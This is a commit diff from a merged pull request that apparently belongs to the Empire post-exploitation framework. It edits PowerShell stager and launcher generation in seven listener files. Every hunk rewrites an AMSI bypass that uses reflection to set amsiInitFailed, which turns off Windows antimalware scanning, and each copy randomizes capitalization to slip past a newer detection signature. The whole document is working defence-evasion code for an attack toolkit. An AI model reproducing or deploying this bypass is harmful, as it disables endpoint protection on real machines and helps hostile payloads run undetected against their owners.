Merge pull request #1041 from hhofs/amsidetectionfix-stagers
minuscule change in bypassing amsifix-for-1142
commit
cb54ad6267
|
@ -214,11 +214,11 @@ class Listener:
|
|||
stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}")
|
||||
|
||||
# @mattifestation's AMSI bypass
|
||||
stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")
|
||||
stager += helpers.randomize_capitalization("$Ref=[Ref].Assembly.GetType(")
|
||||
stager += "'System.Management.Automation.AmsiUtils'"
|
||||
stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(')
|
||||
stager += helpers.randomize_capitalization(');$Ref.GetField(')
|
||||
stager += "'amsiInitFailed','NonPublic,Static'"
|
||||
stager += helpers.randomize_capitalization(").SetValue($null,$true)};")
|
||||
stager += helpers.randomize_capitalization(").SetValue($null,$true);")
|
||||
stager += "};"
|
||||
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
|
||||
|
||||
|
|
|
@ -300,11 +300,11 @@ class Listener:
|
|||
stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}")
|
||||
|
||||
# @mattifestation's AMSI bypass
|
||||
stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")
|
||||
stager += helpers.randomize_capitalization("$Ref=[Ref].Assembly.GetType(")
|
||||
stager += "'System.Management.Automation.AmsiUtils'"
|
||||
stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(')
|
||||
stager += helpers.randomize_capitalization(');$Ref.GetField(')
|
||||
stager += "'amsiInitFailed','NonPublic,Static'"
|
||||
stager += helpers.randomize_capitalization(").SetValue($null,$true)};")
|
||||
stager += helpers.randomize_capitalization(").SetValue($null,$true);")
|
||||
stager += "};"
|
||||
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
|
||||
|
||||
|
|
|
@ -285,11 +285,11 @@ class Listener:
|
|||
stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}")
|
||||
|
||||
# @mattifestation's AMSI bypass
|
||||
stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")
|
||||
stager += helpers.randomize_capitalization("$Ref=[Ref].Assembly.GetType(")
|
||||
stager += "'System.Management.Automation.AmsiUtils'"
|
||||
stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(')
|
||||
stager += helpers.randomize_capitalization(');$Ref.GetField(')
|
||||
stager += "'amsiInitFailed','NonPublic,Static'"
|
||||
stager += helpers.randomize_capitalization(").SetValue($null,$true)};")
|
||||
stager += helpers.randomize_capitalization(").SetValue($null,$true);")
|
||||
stager += "};"
|
||||
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
|
||||
|
||||
|
|
|
@ -182,11 +182,11 @@ class Listener:
|
|||
stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}")
|
||||
|
||||
# @mattifestation's AMSI bypass
|
||||
stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")
|
||||
stager += helpers.randomize_capitalization("$Ref=[Ref].Assembly.GetType(")
|
||||
stager += "'System.Management.Automation.AmsiUtils'"
|
||||
stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(')
|
||||
stager += helpers.randomize_capitalization(');$Ref.GetField(')
|
||||
stager += "'amsiInitFailed','NonPublic,Static'"
|
||||
stager += helpers.randomize_capitalization(").SetValue($null,$true)};")
|
||||
stager += helpers.randomize_capitalization(").SetValue($null,$true);")
|
||||
stager += "};"
|
||||
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
|
||||
|
||||
|
|
|
@ -161,11 +161,11 @@ class Listener:
|
|||
stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}")
|
||||
|
||||
# @mattifestation's AMSI bypass
|
||||
stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")
|
||||
stager += helpers.randomize_capitalization("$Ref=[Ref].Assembly.GetType(")
|
||||
stager += "'System.Management.Automation.AmsiUtils'"
|
||||
stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(')
|
||||
stager += helpers.randomize_capitalization(');$Ref.GetField(')
|
||||
stager += "'amsiInitFailed','NonPublic,Static'"
|
||||
stager += helpers.randomize_capitalization(").SetValue($null,$true)};")
|
||||
stager += helpers.randomize_capitalization(").SetValue($null,$true);")
|
||||
stager += "};"
|
||||
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
|
||||
|
||||
|
|
|
@ -209,11 +209,11 @@ class Listener:
|
|||
launcher += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}")
|
||||
|
||||
# @mattifestation's AMSI bypass
|
||||
launcher += helpers.randomize_capitalization("[Ref].Assembly.GetType(")
|
||||
launcher += helpers.randomize_capitalization("$Ref=[Ref].Assembly.GetType(")
|
||||
launcher += "'System.Management.Automation.AmsiUtils'"
|
||||
launcher += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(')
|
||||
launcher += helpers.randomize_capitalization(');$Ref.GetField(')
|
||||
launcher += "'amsiInitFailed','NonPublic,Static'"
|
||||
launcher += helpers.randomize_capitalization(").SetValue($null,$true)};")
|
||||
launcher += helpers.randomize_capitalization(").SetValue($null,$true);")
|
||||
launcher += "};"
|
||||
launcher += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
|
||||
|
||||
|
|
|
@ -131,11 +131,11 @@ class Listener:
|
|||
stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}")
|
||||
|
||||
# @mattifestation's AMSI bypass
|
||||
stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")
|
||||
stager += helpers.randomize_capitalization("$Ref=[Ref].Assembly.GetType(")
|
||||
stager += "'System.Management.Automation.AmsiUtils'"
|
||||
stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(')
|
||||
stager += helpers.randomize_capitalization(');$Ref.GetField(')
|
||||
stager += "'amsiInitFailed','NonPublic,Static'"
|
||||
stager += helpers.randomize_capitalization(").SetValue($null,$true)};")
|
||||
stager += helpers.randomize_capitalization(").SetValue($null,$true);")
|
||||
stager += "};"
|
||||
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
|
||||
|
||||
|
|
Loading…
Reference in New Issue